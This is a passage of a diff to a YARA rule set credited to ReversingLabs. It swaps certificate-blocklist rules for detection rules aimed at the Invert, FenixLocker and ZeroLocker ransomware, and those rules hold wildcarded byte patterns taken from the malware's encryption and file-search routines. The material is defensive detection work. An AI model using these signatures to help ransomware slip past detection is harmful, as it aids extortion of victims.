($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_11690F05604445Fae0De539Eeeeec584 : INFO FILE +rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Invert : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Invert ransomware." author = "ReversingLabs" - id = "e6513bd1-2524-5baa-8484-b7e0f2f0c02a" - date = "2023-11-08" - modified = "2023-11-08" + id = "7ef77946-a902-5dc6-9b3c-b7b6a687eb96" + date = "2021-11-11" + modified = "2021-11-11" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2596-L2612" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "b66257f562f698559910eb9576f8fdf0ce3a750cc0a96a27e2ec1a18872ad13f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/ByteCode.MSIL.Ransomware.Invert.yara#L1-L66" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1608b8bbfc03b18a79752e60f211da7d7703862bc06b2ddf094074ae5efd0d14" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Invert" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files = { + 73 ?? ?? ?? ?? 0A 06 04 7D ?? ?? ?? ?? 00 00 02 28 ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 25 2D + ?? 26 06 06 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 0C 7D ?? ?? ?? ?? 08 7E ?? ?? ?? ?? 25 + 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? + ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? + ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 + ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? + FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D + ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? + 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? + ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 2B ?? 07 6F ?? ?? ?? ?? 0D 00 00 09 03 28 ?? ?? + ?? ?? 13 ?? 11 ?? 2C ?? 00 7E ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 26 00 00 DE ?? 26 00 00 DE + ?? 00 07 6F ?? ?? ?? ?? 2D ?? DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? 00 DC 2A + } + $find_files = { + 00 73 ?? ?? ?? ?? 0A 00 28 ?? ?? ?? ?? 18 8D ?? ?? ?? ?? 25 16 28 ?? ?? ?? ?? A2 25 17 + 72 ?? ?? ?? ?? A2 17 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 2B ?? 12 ?? 28 ?? + ?? ?? ?? 0C 00 06 08 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE + ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 06 + 0D 2B ?? 09 2A + } + $get_file_list = { + 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 06 2C + ?? 00 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 38 ?? ?? + ?? ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0B + 00 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 2B ?? 12 ?? 28 ?? ?? ?? ?? 0D 00 07 09 6F ?? ?? + ?? ?? 00 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 + DC 00 DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? 00 DC 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? + ?? 28 ?? ?? ?? ?? 18 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 + ?? ?? ?? ?? 18 28 ?? ?? ?? ?? 00 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F + ?? ?? ?? ?? 00 00 2A + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Tera information Technology co.Ltd" and pe.signatures[i].serial=="11:69:0f:05:60:44:45:fa:e0:de:53:9e:ee:ee:c5:84" and 1294703999<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($get_file_list) and ($find_files) and ($encrypt_files) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_Aa146Bff4B832Bdbfe30B84580356763 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Fenixlocker : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects FenixLocker ransomware." author = "ReversingLabs" - id = "90fab567-f39f-5d0b-b0d9-a93693a05a01" - date = "2023-11-08" - modified = "2023-11-08" + id = "4868ced4-885d-548c-993c-ae25ab188172" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2614-L2632" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "37abe7a4fd773fd34f5d7dbe725ba4edcfb8ebb501dc41f386b8b0629161051f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.FenixLocker.yara#L1-L143" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "72712616df2c73c5c17696a7c5cb93f767910acf5f49cda27373fccfa29c5a4d" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "FenixLocker" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yancheng Peoples Information Technology Service Co., Ltd" and (pe.signatures[i].serial=="00:aa:14:6b:ff:4b:83:2b:db:fe:30:b8:45:80:35:67:63" or pe.signatures[i].serial=="aa:14:6b:ff:4b:83:2b:db:fe:30:b8:45:80:35:67:63") and 1295481599<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_E86F46B60142092Aae81B8F6Fa3D9C7C : INFO FILE + strings: + $encrypt_files_1 = { + 55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 68 ?? ?? ?? + ?? 8D 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 8B F1 E8 ?? ?? ?? ?? 83 C4 + ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 + 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 6A ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 8D 85 ?? + ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? + E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5E 8B 4D ?? 33 CD E8 ?? ?? + ?? ?? 8B E5 5D C3 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? FF + B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 + ?? ?? ?? ?? 50 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? + ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 83 C4 ?? 33 C0 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8D 85 ?? ?? ?? ?? 50 + FF B5 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? + ?? ?? 50 68 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 46 ?? 50 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? + ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? + 85 C0 0F 84 ?? ?? ?? ?? 57 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8B F8 + 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 83 7E ?? ?? 72 ?? 8B 36 FF B5 ?? ?? ?? ?? 56 57 E8 + ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 50 57 6A ?? 6A ?? 6A ?? FF + B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B + E5 5D C3 8B 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 01 8B C7 8B 4D ?? 5F 33 CD 5E E8 ?? + ?? ?? ?? 8B E5 5D C3 + } + $encrypt_files_2 = { + B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 + ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? + F6 85 ?? ?? ?? ?? ?? 8D 55 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B D0 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? + 8B F8 C6 45 ?? ?? 8B 4D ?? 8B 55 ?? 41 3B D1 77 ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 8B 55 + ?? 8B 4D ?? 4A 8B 45 ?? 23 CA 03 C1 89 4D ?? 8B 4D ?? 23 D0 83 3C 91 ?? 8D 34 95 ?? + ?? ?? ?? 75 ?? 6A ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 89 04 31 8B 4D ?? 8B 0C 31 85 + C9 74 ?? 57 E8 ?? ?? ?? ?? FF 45 ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 + 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B + C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 + C4 ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 + ?? ?? 83 F8 ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ?? ?? + ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ?? 0F + 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B BD ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? + 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 85 F6 0F 8E ?? ?? + ?? ?? 68 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? + 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? + ?? ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? 83 F8 ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ?? ?? ?? + ?? 72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? + 0F 82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 + ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? + ?? ?? ?? 8B 40 ?? F6 84 05 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? + ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? + 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F + 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 + E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? + ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8 8B 51 ?? 83 CA ?? 8B C2 83 C8 ?? 83 79 ?? + ?? 0F 45 C2 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? + ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 + ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? + ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 C7 85 + ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? FF 15 ?? ?? ?? ?? 57 FF + 15 ?? ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? + ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? + ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? B0 ?? 8B 4D ?? 64 89 0D ?? ?? ?? + ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $encrypt_files_3 = { + E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B D0 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 + ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? 83 F8 ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ?? ?? ?? ?? + 72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F + 82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? + ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 83 FE ?? 0F + 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? + ?? 8D 8D ?? ?? ?? ?? 8A 11 3A 10 75 ?? 84 D2 74 ?? 8A 51 ?? 3A 50 ?? 75 ?? 83 C1 ?? + 83 C0 ?? 84 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? + 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? + ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? + 8D 4D ?? 0F 43 4D ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 7E ?? 83 7D ?? ?? 8D 4D ?? 8D + 45 ?? 0F 43 4D ?? 83 7D ?? ?? 51 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? + 46 EB ?? 85 F6 75 ?? 83 F8 ?? B8 ?? ?? ?? ?? 0F 45 F0 89 B5 ?? ?? ?? ?? 8D 4D ?? E8 + ?? ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? 0F 82 ?? ?? ?? ?? 8B 4D ?? 40 3D ?? ?? ?? + ?? 72 ?? F6 C1 ?? 75 ?? 8B 41 ?? 3B C1 73 ?? 2B C8 83 F9 ?? 72 ?? 83 F9 ?? 77 ?? 8B + C8 51 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? E8 + } + $encrypt_files_4 = { + 8B BD ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 + 0F 85 ?? ?? ?? ?? 85 F6 0F 8E ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 + ?? ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? 83 F8 ?? 72 + ?? 40 8D 8D ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 85 + ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8B 40 ?? + F6 84 05 ?? ?? ?? ?? ?? 75 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B D0 C6 45 ?? ?? 8D 8D ?? + ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? + E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D + ?? ?? ?? ?? 8B 40 ?? 03 C8 8B 41 ?? 83 C8 ?? 83 79 ?? ?? 75 ?? 83 C8 ?? 6A ?? 50 E8 + ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? + ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 + ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D + 41 ?? 89 84 0D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 C7 85 ?? ?? ?? ?? ?? ?? + ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 83 + 7D ?? ?? 0F 85 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 75 ?? + E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 + } + $encrypt_files_5 = { + FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? + ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? C7 45 ?? ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? + ?? ?? B0 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B + E5 5D C3 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B D0 8D 4D ?? E8 ?? ?? ?? + ?? 83 C4 ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 8D 8D ?? ?? ?? ?? 50 FF + B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? + ?? ?? C6 85 ?? ?? ?? ?? ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? + ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 + ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 4D ?? C7 + 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? + ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 8D 4D ?? 0F 43 4D ?? 50 E8 ?? ?? ?? ?? 83 C4 + ?? 85 C0 7E ?? 83 7D ?? ?? 8D 4D ?? 8D 45 ?? 0F 43 4D ?? 83 7D ?? ?? 51 0F 43 45 ?? + 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 46 89 B5 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? + 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? 0F 82 ?? ?? ?? + ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? E9 + } + + condition: + uint16(0)==0x5A4D and ($encrypt_files_1 and $encrypt_files_2 and $encrypt_files_3) or ($encrypt_files_1 and $encrypt_files_4 and $encrypt_files_5) +} +rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Zerolocker : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects ZeroLocker ransomware." author = "ReversingLabs" - id = "fde17cc1-a968-5134-b12b-d65cb34c086f" - date = "2023-11-08" - modified = "2023-11-08" + id = "291b5640-387c-54d9-97a6-13823932fa60" + date = "2021-08-12" + modified = "2021-08-12" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2634-L2652" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "6de16a44bc84fbf8f1d3d82526e1d7f8fd4ae3da6deaa471c77d2c8df47a14b0" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/ByteCode.MSIL.Ransomware.ZeroLocker.yara#L1-L70" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "147e4b390bcfaff8f05059c1d9a98b50f544fc32e820406417894fe5046e0f71" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "ZeroLocker" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_routine_1 = { + 00 28 5B 00 00 0A 20 ?? 07 00 00 28 60 00 00 06 13 09 20 ?? 07 00 00 28 60 00 00 06 13 + 0B 02 03 20 ?? 07 00 00 28 60 00 00 06 20 ?? 07 00 00 28 60 00 00 06 73 ?? 00 00 0A 7D + 1B 00 00 04 20 ?? 07 00 00 28 60 00 00 06 13 0B 02 04 20 ?? 07 00 00 28 60 00 00 06 20 + ?? 07 00 00 28 60 00 00 06 73 ?? 00 00 0A 7D 1C 00 00 04 20 ?? 07 00 00 28 60 00 00 06 + 13 0B 02 7B 1C 00 00 04 20 ?? 07 00 00 28 60 00 00 06 6A 6F ?? 00 00 0A 00 20 ?? 07 00 + 00 28 60 00 00 06 13 0B 20 ?? 07 00 00 28 60 00 00 06 8D 1E 00 00 01 0A 20 ?? 07 00 00 + 28 60 00 00 06 13 0B 20 ?? 07 00 00 28 60 00 00 06 6A 13 04 20 ?? 07 00 00 28 60 00 00 + 06 13 0B 02 7B 1B 00 00 04 6F ?? 00 00 0A [0-2] 13 05 20 ?? 07 00 00 28 60 00 00 06 13 + 0B 73 ?? 00 00 0A 0C 20 ?? 07 00 00 28 60 00 00 06 13 0B 00 0E 05 20 ?? 07 00 00 28 60 + 00 00 06 59 13 0C 11 0C 45 02 00 00 00 02 00 00 00 ?? 00 00 00 2B ?? 00 20 ?? 07 00 00 + 28 60 00 00 06 13 0B 02 7B 1C 00 00 04 08 05 0E 04 6F ?? 00 00 0A [0-2] 20 ?? 07 00 00 + 28 60 00 00 06 73 ?? 00 00 0A 0B 2B ?? 00 20 ?? 07 00 00 28 60 00 00 06 13 0B 02 7B 1C + 00 00 04 08 05 0E 04 6F ?? 00 00 0A [0-2] 20 ?? 07 00 00 28 60 00 00 06 73 ?? 00 00 0A + 0B 00 2B 62 20 ?? 07 00 00 28 60 00 00 06 13 0B 02 7B 1B 00 00 04 06 20 ?? 07 00 00 28 + 60 00 00 06 20 ?? 07 00 00 28 60 00 00 06 6F ?? 00 00 0A [0-2] 0D 20 ?? 07 00 00 28 60 + } + $encrypt_routine_2 = { + 00 00 06 13 0B 07 06 20 ?? 07 00 00 28 60 00 00 06 09 6F ?? 00 00 0A 00 20 ?? 07 00 00 + 28 60 00 00 06 13 0B 11 04 09 6A D6 13 04 00 20 ?? 07 00 00 28 60 00 00 06 13 0B 11 04 + 11 05 FE 04 13 0D 11 0D 2D 86 ?? 45 01 00 00 